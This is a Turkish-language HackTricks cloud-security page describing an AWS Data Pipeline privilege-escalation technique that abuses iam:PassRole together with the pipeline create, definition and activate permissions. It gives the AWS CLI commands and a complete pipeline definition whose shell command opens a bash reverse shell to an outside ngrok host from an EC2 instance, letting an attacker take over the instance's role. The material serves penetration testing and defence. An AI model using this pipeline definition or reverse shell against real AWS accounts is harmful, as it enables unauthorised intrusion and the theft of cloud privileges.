AWS - Datapipeline Privesc

htARTE (HackTricks AWS Kırmızı Takım Uzmanı) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları:

datapipeline

Datapipeline hakkında daha fazla bilgi için:

pageAWS - DataPipeline, CodePipeline & CodeCommit Enum

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

Bu izinlere sahip kullanıcılar, bir Veri Boru Hattı oluşturarak atanmış rolün izinlerini kullanarak keyfi komutları yürüterek ayrıcalıkları yükseltebilirler:

aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string

Pipeline oluşturulduktan sonra, saldırgan tanımını günceller ve belirli eylemleri veya kaynak oluşturmalarını belirler:

{
"objects": [
{
"id" : "CreateDirectory",
"type" : "ShellCommandActivity",
"command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
"runsOn" : {"ref": "instance"}
},
{
"id": "Default",
"scheduleType": "ondemand",
"failureAndRerunMode": "CASCADE",
"name": "Default",
"role": "assumable_datapipeline",
"resourceRole": "assumable_datapipeline"
},
{
"id" : "instance",
"name" : "instance",
"type" : "Ec2Resource",
"actionOnTaskFailure" : "terminate",
"actionOnResourceFailure" : "retryAll",
"maximumRetries" : "1",
"instanceType" : "t2.micro",
"securityGroups" : ["default"],
"role" : "assumable_datapipeline",
"resourceRole" : "assumable_ec2_profile_instance"
}]
}

Dikkat edin ki 14., 15. ve 27. satırdaki rol, datapipeline.amazonaws.com tarafından alınabilir bir rol olmalıdır ve 28. satırdaki rol, EC2 profil örneği ile ec2.amazonaws.com tarafından alınabilir bir rol olmalıdır.

Ayrıca, EC2 örneği sadece EC2 örneği tarafından alınabilen role erişim sağlayacaktır (sadece o rolü çalabilirsiniz).

```bash aws datapipeline put-pipeline-definition --pipeline-id \ --pipeline-definition file:///pipeline/definition.json ``` **Saldırgan tarafından oluşturulan pipeline tanım dosyası, komutları yürütmek veya kaynaklar oluşturmak için AWS API'sini kullanarak Data Pipeline'ın rol izinlerinden yararlanır ve potansiyel olarak ek ayrıcalıklar elde eder.**

Potansiyel Etki: Belirtilen ec2 hizmet rolüne doğrudan ayrıcalık yükseltme.

Referanslar

htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları:

Last updated